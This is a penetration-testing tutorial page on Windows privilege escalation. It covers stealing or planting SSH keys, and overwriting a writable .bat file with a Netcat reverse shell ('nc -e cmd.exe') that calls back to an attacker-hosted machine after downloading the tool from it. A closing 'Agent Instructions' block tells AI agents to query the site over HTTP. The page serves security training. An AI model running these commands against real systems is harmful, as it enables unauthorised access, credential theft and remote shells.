# Windows Privilege Escalation
Here are some techniques for achieving privilege escalation on *Windows* systems:
## Abusing SSH keys
* Check if we have reading permissions on the SSH private keys of a user
{% code overflow="wrap" lineNumbers="true" %}
```bash
#On the target machine
type C:\Users\$user\.ssh\$keyfile #For a user
```
{% endcode %}
{% hint style="info" %}
Standard key files are called *id\_rsa*
{% endhint %}
***
* Copy the keys to a file, assign permissions to the file, and use it to log in using the key
#On our machine
nano $filename #Copy here the keys
chmod 600 $filename
ssh $username@$IP -i $filename
{% hint style="info" %}
Use `chmod 600 id_rsa` to assign restrictive permissions, and SSH does not block this method
{% endhint %}
***
* When having writing permissions on the `.ssh/` directory of a user, we can generate an SSH key with the current user and pass it to the system
{% code overflow="wrap" lineNumbers="true" %}
```bash
ssh-keygen -f $keyfile
```
{% endcode %}
{% hint style="info" %}
This will generate the file with a private key for the user and a `.pub` file with a public key
{% endhint %}
***
* Pass the public key to the authorized keys file of the *root* user
{% code overflow="wrap" lineNumbers="true" %}
```bash
type $keyfilename.pub > C:\Users\$user\.ssh\authorized_keys
```
{% endcode %}
***
* Use this to log in as the user using the key
ssh $username@$IP -i $keyfile
## Abusing .bat files with full control permissions
In the situation where a *.bat* file (script file for Windows) is being executed on the system and it has full-control permissions, it's possible to abuse this to modify the content of the *.bat* file and execute commands with privileges arbitrarily
* Try spawning a PowerShell from the *CMD* with any user we have access to
{% code overflow="wrap" lineNumbers="true" %}
```powershell
...> powershell
PS ...> #If it worked, the command line will look like this
```
{% endcode %}
***
* Find a *.bat* file, and check if it has full-control permissions. In case it has, check if it is calling any process and if any of them is still running
icacls $batFile #Check permissions
cat $batFile #Check the content to know if it is calling any process
ps #Check if called processes are still running
***
* Download and import a *Netcat* executable for *Windows*
{% code overflow="wrap" lineNumbers="true" %}
```powershell
# In our machine
wget https://github.com/int0x33/nc.exe/blob/master/nc64.exe #Get NC executable
python3 -m http.server $myPort #In the folder where we have the executable
# In the target machine
wget http://$myIP:$myPort/nc64.exe -outfile nc64.exe
```
{% endcode %}
***
* Set *Netcat* listener to catch the connection and replace the content of the *.bat* file with a command spawning the *Netcat* executable
{% code overflow="wrap" lineNumbers="true" %}
```powershell
# In our machine
nc -nvlp $ncPort
# In the target machine
echo $ncFilePath -e cmd.exe $myIP $ncPort > $batFilePath
```
{% endcode %}
{% hint style="info" %}
Then we just had to wait for the system to run the script again, now executing our payload
{% endhint %}
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://kryptocoder.gitbook.io/hacking-knowledge/penetration-testing/process-stages/post-exploitation/privilege-escalation/windows-privilege-escalation.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.